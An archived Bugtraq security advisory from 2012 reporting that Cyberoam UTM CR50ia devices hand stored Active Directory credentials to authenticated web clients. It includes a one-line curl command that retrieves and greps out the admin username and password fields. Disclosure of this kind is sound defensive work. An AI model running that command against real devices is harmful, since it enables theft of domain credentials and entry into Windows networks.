lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Mar 2012 08:41:13 +0200
From: Saurabh Harit <saurabh.harit@...il.com>
To: bugtraq@...urityfocus.com
Cc: saurabh.harit@...il.com
Subject: Cyberoam Unified Threat Management: Insecure Password Handling

Hi,

Please find below the details of a vulnerability I discovered in
Cyberoam UTM device. The Vendor was notified, however I did not
receive any response from Vendor despite repeated email reminders.

SECURITY ADVISORY:  cyberoam-utm-insecure-password-handling

Affected Software:   Cyberoam CR50ia 10.01.0 build 678
Vulnerability:       Insecure Password Handling
Severity:            High
Release Date:        Unreleased
	

I. Background
~~~~~~~~~~~~~	   	

"Cyberoam Unified Threat Management appliances offer assured security,
connectivity and productivity to Small Office-Home Office (SOHO) and
Remote Office-Branch Office (ROBO) users by allowing user
identity-based policy controls."

Cyberoam UTM integrates with Active Directory. In order to query data
from a configured AD, domain credentials are stored within the device.
These credentials are retrievable by an authenticated user.


II. Description
~~~~~~~~~~~~~~~

Domain credentials are stored on the device and passed to web
clientson a diagnostic page (Identity --> Authentication -->
Authentication Server --> /Select Configured AD/ ).  Authenticated
clients can thus easily access stored credentials.

A trivial check for this follows (replace cookie value):

curl -s -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: blah"
"http://<webserver>/corporate/webpages/identity/ActiveDirectoryEdit.jsp?__RequestType=ajax&&objectID=1&pageid=pagePopupForm1"|egrep
'(adminusername|passwdvalue)'


III. Impact
~~~~~~~~~~~

The vulnerability allows a malicious user to access potentially
privileged domain credentials. Should default passwords not be
changed, then this is a trivial entry point onto a Windows domain.


IV. Remediation
~~~~~~~~~~~~~~~

Do not return stored credentials to the browser.


V. Disclosure
~~~~~~~~~~~~~

Reported By: Saurabh Harit, Senior Security Analyst, SensePost

Discovery Date:         2011-11-01


VI. References
~~~~~~~~~~~~~

[1] http://www.cyberoamworks.com/Cyberoam-CR50ia.asp

Thanks & Regards,
-------------------------------------------------------
Saurabh Harit
Senior Security Analyst
SensePost Pvt Ltd
Phone: +27 768006821

Powered by blists - more mailing lists